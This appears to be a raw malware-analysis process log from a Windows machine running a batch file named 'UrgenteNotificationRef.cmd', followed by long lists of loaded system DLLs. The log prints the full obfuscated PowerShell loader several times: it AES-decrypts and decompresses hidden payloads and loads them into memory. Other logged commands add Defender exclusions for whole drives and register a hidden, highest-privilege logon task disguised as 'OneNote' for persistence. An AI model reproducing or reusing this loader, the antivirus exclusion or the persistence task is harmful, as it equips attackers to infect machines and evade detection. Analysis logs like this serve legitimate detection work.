    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\UrgenteNotificationRef.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR 
([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\UrgenteNotificationRef.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
    Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
